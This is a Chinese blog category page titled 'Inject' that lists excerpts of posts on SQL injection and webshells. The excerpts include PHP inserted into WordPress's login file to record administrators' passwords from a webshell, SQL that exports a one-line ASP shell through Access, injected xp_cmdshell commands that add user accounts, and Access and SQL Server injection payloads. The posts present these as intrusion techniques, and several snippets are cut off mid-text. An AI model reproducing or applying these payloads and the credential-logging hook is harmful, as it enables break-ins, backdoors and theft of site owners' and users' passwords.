Inject
文章平均质量分 60
asli33
这个作者很懒,什么都没留下…
展开
-
SQL语法摘要
1、SQL 对大小写不敏感,但对其中存入的数据敏感2、分号是在数据库系统中分隔每条 SQL 语句的标准方法,这样就可以在对服务器的相同请求中执行一条以上的语句。如果您使用的是 MS Access 和 SQL Server 2000,则不必在每条 SQL 语句之后使用分号,原创 2011-09-01 18:18:08 · 517 阅读 · 0 评论 -
webshell下记录WordPress登陆密码
webshell下记录Wordpress登陆密码方便进一步社工Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。在文件wp-login.php中539行处添加: // log password $log_user=$_POST['log']; $log_pwd=$_POST['pwd']; $log_ip=$_SERVER["R转载 2012-08-14 17:02:45 · 1626 阅读 · 0 评论 -
ACCESS导出一句话SHELL
1.create table cmd (a varchar(50))2.insert into cmd (a) values (‘’)3.select * into [a] in ‘C:\\www.tmdsb.com\\tmdsb.asa;.xls’ ‘excel 4.0;’ from cmd(把表cmd的内容导出为物理路径的一个EXCEL文件)4.drop table cmd转载 2012-08-14 11:50:29 · 405 阅读 · 0 评论 -
Access数据库注入高级玩法
http://ynhu33.blog.51cto.com/412835/259144Access数据库注入高级玩法,鉴于论坛的朋友要求,在这整理下,以飨读者。Access数据库想对于MsSql来说可谓小巫见大巫,但是Acc的数据库在目前国内还是有一定的市场,其注入也很灵活。相信你看完本文就会了解到Access也是很强大的。一,基础篇1、猜解表名,这里借用啊D的语句:and转载 2012-02-21 13:30:49 · 686 阅读 · 0 评论 -
Access SQL注入参考
Access SQL注入参考 描述SQL查询及注释注释符Access中没有专门的注释符号.因此"/*", "--"和"#"都没法使用.但是可以使用空字符"NULL"(%00)代替:' UNION SELECT 1,1,1 FROM validTableName%00语法错误信息"[Microsoft][Driver ODB翻译 2012-02-17 18:00:43 · 695 阅读 · 0 评论 -
利用系统表注入SQLServer数据库
SQL Server是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子: ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”-- 分号;在SQLServer中表示转载 2012-02-17 11:56:48 · 407 阅读 · 0 评论 -
SQLServer与Access数据库的判别方法
不同的数据库的函数、注入方法都是有差异的,所以在注入之前,我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer,网上超过99%的网站都是其中之一。 怎么让程序告诉你它使用的什么数据库呢?来看看: SQLServer有一些系统变量,如果服务器IIS提示没关闭,并且SQLServer返回错误提示的话,那可以直接从出错信息获取,方法如下转载 2012-02-15 11:52:14 · 725 阅读 · 0 评论 -
注入过程中的中文处理方法
中文处理方法 在注入中碰到中文字符是常有的事,有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解,“中文恐惧症”很快可以克服。 先说一点常识: Access中,中文的ASCII码可能会出现负数,取出该负数后用abs()取绝对值,汉字字符不变。 SQL Server中,中文的ASCII为正数,但由于是UNICODE的双位编码,不能转载 2012-02-15 12:58:46 · 390 阅读 · 0 评论 -
SQL注入常用函数
SQL注入常用函数 有SQL语言基础的人,在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平,特别是一些常用的函数及命令。 Access:asc(字符) SQLServer:unicode(字符) 作用:返回某字符的ASCII码 Access:chr(数字) SQLServer:nchar(数字) 作用:与asc转载 2012-02-15 12:57:40 · 818 阅读 · 0 评论 -
注入中表格长度限制的突破
链接地址:http://www.5778.com/help/safe/safe2_3.htm在表格页上加一些限制,比如maxlength等等,攻击者可以突破sql注入攻击时输入框长度的限制.写一个SOCKET程序改变HTTP_REFERER?我不会。网上发表了这样一篇文章:------------len.reG----------------- Windows R转载 2012-02-15 12:43:15 · 624 阅读 · 0 评论 -
mysql中的char函数用法
CHAR(N,... [USING charset]) CHAR()将每个参数N理解为一个整数,其返回值为一个包含这些整数的代码值所给出的字符的字符串。NULL值被省略。mysql> SELECT CHAR(77,121,83,81,'76'); -> 'MySQL'mysql> SELECT CHAR(77,77.3,'77.3'); -> '转载 2011-12-21 11:33:11 · 10966 阅读 · 0 评论 -
ASP WEBSHELL权限总结
文章作者:enterer博客:www.enterer.cn转载请保留我为什么会写这篇文章呢,当然是因为我很闲(误)。因为本人虽然是个菜鸟,学习也就4个多月,但是觉得应该写些东西和大家交流。本人是提权爱好者,虽然技术一般,但是有耐心些出来和大家交流交流。打算写个提权的系列文章,汗,本人也只是小白而已。提 权的基础是什么呢?拿到一个webshell,你最想干什么呢,当然是拿下服务器了。转载 2013-10-12 16:07:03 · 2805 阅读 · 0 评论